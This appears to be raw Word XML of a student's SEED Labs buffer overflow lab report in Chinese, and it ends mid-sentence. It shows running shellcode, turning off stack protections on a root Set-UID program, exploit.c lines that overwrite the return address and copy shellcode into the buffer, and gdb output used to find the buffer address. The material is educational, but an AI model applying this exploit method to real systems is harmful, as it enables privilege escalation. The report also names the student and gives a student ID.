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723BE2" w14:textId="2A618A83" w:rsidR="004F45A1" w:rsidRDefault="004F45A1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F45A1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SEED Labs – Buffer Overflow Vulnerability Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCDA385" w14:textId="2C8E4177" w:rsidR="004F45A1" w:rsidRDefault="004F45A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姓名：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>严佳豪</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>，学号：57118136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6E9297" w14:textId="7B0B8C44" w:rsidR="00E60991" w:rsidRDefault="004F45A1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F45A1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task 1: Running Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05111441" w14:textId="0D10A1CE" w:rsidR="004F45A1" w:rsidRDefault="007E4922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695F29A8" wp14:editId="6F6C1CC1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>236220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1043940"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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612"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1043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F45A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidR="008410DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所给</w:t>
      </w:r>
      <w:r w:rsidR="004F45A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码保存为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F45A1" w:rsidRPr="004F45A1">
        <w:t>call_shellcode.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F45A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，执行结果保存为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F45A1" w:rsidRPr="004F45A1">
        <w:t>call_shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F45A1">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="004F45A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7535E2DE" w14:textId="356B7300" w:rsidR="00141302" w:rsidRDefault="00141302">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取了用户权限</w:t>
      </w:r>
      <w:r w:rsidR="00C22429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE52104" w14:textId="5C433E5D" w:rsidR="007E4922" w:rsidRDefault="007E4922"/>
    <w:p w14:paraId="1ABC4F54" w14:textId="796EFEE7" w:rsidR="00141302" w:rsidRDefault="00141302">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将所给的存在漏洞的代码保存为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stack.</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，编译执行结果保存为stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B850E" w14:textId="6BC1E7FD" w:rsidR="00141302" w:rsidRDefault="00141302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1DE0B37A" wp14:editId="08EDBA12">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>438150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1203960"/>
            <wp:effectExtent l="0" t="0" r="254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567"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="120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41302">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00141302">
        <w:t>StackGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00141302">
        <w:t>和non-executable stack protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将该程序设为拥有root权限的Set</w:t>
      </w:r>
      <w:r>
        <w:t>-UID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382DF329" w14:textId="58237095" w:rsidR="00CE2DCB" w:rsidRPr="00CE2DCB" w:rsidRDefault="00141302">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00141302">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task 2: Exploiting the Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113BDA6D" w14:textId="77777777" w:rsidR="00CE2DCB" w:rsidRPr="00CE2DCB" w:rsidRDefault="00CE2DCB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AFC0C7A" w14:textId="3AC71B72" w:rsidR="00141302" w:rsidRDefault="008410DD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将所给代码保存为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008410DD">
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，添加代码为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA1653" w14:textId="77777777" w:rsidR="00CE2DCB" w:rsidRDefault="00CE2DCB" w:rsidP="00CE2DCB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>strcpy(buffer,"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>\xA7\xEA\xFF\xBF");     //在buffer特定偏移处起始的四个字节覆盖</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32362489" w14:textId="77777777" w:rsidR="00CE2DCB" w:rsidRDefault="00CE2DCB" w:rsidP="00CE2DCB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(buffer+80,shellcode);           //将shellcode拷贝至buffer+80处。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF1BCA8" w14:textId="77777777" w:rsidR="00CE2DCB" w:rsidRDefault="00CE2DCB" w:rsidP="00CE2DCB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7700A96B" w14:textId="3DE5270B" w:rsidR="008410DD" w:rsidRDefault="00CE2DCB" w:rsidP="00CE2DCB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定过程</w:t>
      </w:r>
      <w:r w:rsidR="00FF5B79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5A7A5B" w14:textId="251ABE43" w:rsidR="008410DD" w:rsidRDefault="00FC178D" w:rsidP="008410DD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入以下命令确定shellcode的存放地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB78651" w14:textId="77777777" w:rsidR="00FC178D" w:rsidRDefault="00FC178D" w:rsidP="00FC178D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA8A27F" w14:textId="77777777" w:rsidR="00FC178D" w:rsidRDefault="00FC178D" w:rsidP="00FC178D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>b main //在main函数出下断点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626ED081" w14:textId="77777777" w:rsidR="00FC178D" w:rsidRDefault="00FC178D" w:rsidP="00FC178D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>r //运行stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E01D640" w14:textId="5E790DDA" w:rsidR="00FC178D" w:rsidRDefault="00FC178D" w:rsidP="00FC178D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>p /x &amp;str //查看str的地址，shellcode代码存储在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badfle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>文件的第80个字节处，在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stack.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>程序中，从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>文件读取数据到stack的str变量中，查看该变量的起始地址，加上80（0x50）即是shellcode的起始位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65153DBC" w14:textId="7AEE3175" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00FC178D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EEC3F61" w14:textId="555DD22E" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00FC178D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609A7EC" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb-peda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$ b main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7BEB90" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">Breakpoint 1 at 0x804851e: file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stack.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, line 29.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C08E38E" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>gdb-peda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$ r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0E9C52" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">Starting program: /home/seed/Desktop/stack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378FD88C" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B"/>
    <w:p w14:paraId="247335C6" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>[----------------------------------registers-----------------------------------]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E2A845" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>EAX: 0xb7fb8dbc --&gt; 0xbfffed1c --&gt; 0xbfffef47 ("LC_PAPER=zh_CN.UTF-8")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5E59DF" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">EBX: 0x0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAAB520" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">ECX: 0xbfffec80 --&gt; 0x1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F362DF" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">EDX: 0xbfffeca4 --&gt; 0x0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4124BB1C" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">ESI: 0xb7fb7000 --&gt; 0x1b1db0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B008E" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">EDI: 0xb7fb7000 --&gt; 0x1b1db0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C12A31" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">EBP: 0xbfffec68 --&gt; 0x0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7C7524" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>ESP: 0xbfffea30 --&gt; 0xb7e763a0 (&lt;__GI___</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc_realloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&gt;:push</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A6A9AB" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>EIP: 0x804851e (&lt;main+20&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sub    esp,0x4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC7B274" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">EFLAGS: 0x286 (carry PARITY </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>adjust</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zero SIGN trap INTERRUPT direction overflow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2715E1DC" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>[-------------------------------------code-------------------------------------]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8686F9" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">   0x8048515 &lt;main+11&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">mov    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ebp,esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7CF4ADF5" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">   0x8048517 &lt;main+13&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">push   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51C29659" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">   0x8048518 &lt;main+14&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sub    esp,0x234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310EC866" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>=&gt; 0x804851e &lt;main+20&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sub    esp,0x4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2AB265" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">   0x8048521 &lt;main+23&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>push   0x18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440A8F27" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">   0x8048523 &lt;main+25&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>push   0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6422A96D" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">   0x8048525 &lt;main+27&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">lea    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ebp-0x229]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CAA7C5" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">   0x804852b &lt;main+33&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">push   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1992FCFF" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>[------------------------------------stack-------------------------------------]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3700809A" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>0000| 0xbfffea30 --&gt; 0xb7e763a0 (&lt;__GI___</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc_realloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&gt;:push</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2952761A" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>0004| 0xbfffea34 --&gt; 0xb7fdb4c4 --&gt; 0x74725f00 ('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B899B56" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">0008| 0xbfffea38 --&gt; 0xb7fdb66e --&gt; 0x60000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49190E8E" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">0012| 0xbfffea3c --&gt; 0xb7fdb66e --&gt; 0x60000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61502F08" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">0016| 0xbfffea40 --&gt; 0xb7fdb000 --&gt; 0x464c457f </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2930C1" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>0020| 0xbfffea44 --&gt; 0xb7ff1e96 (&lt;malloc+6&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>add    ebx,0xd16a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334036B4" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">0024| 0xbfffea48 --&gt; 0xb7fff000 --&gt; 0x23f3c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417F6205" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>0028| 0xbfffea4c --&gt; 0xb7ff1ef9 (&lt;calloc+73&gt;:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>add    esp,0x10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE0305C" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>[------------------------------------------------------------------------------]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AC0B66" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">Legend: code, data, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rodata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283DF098" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B"/>
    <w:p w14:paraId="6B43B4F5" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>Breakpoint 1, main (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>argc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=0x1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0xbfffed14)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F820E9F" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t xml:space="preserve">    at stack.c:29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B77A7BA" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>29</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">char </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dummy[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">BUF_SIZE]; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>memset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(dummy, 0, BUF_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186A6CBB" w14:textId="77777777" w:rsidR="00C30B4B" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb-peda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$ p /x &amp;str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B6289A" w14:textId="45D9F376" w:rsidR="00141302" w:rsidRDefault="00C30B4B" w:rsidP="00C30B4B">
      <w:r>
        <w:t>$1 = 0xbfffea57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BCDEFE" w14:textId="2E573B21" w:rsidR="00141302" w:rsidRDefault="00C30B4B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>故shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
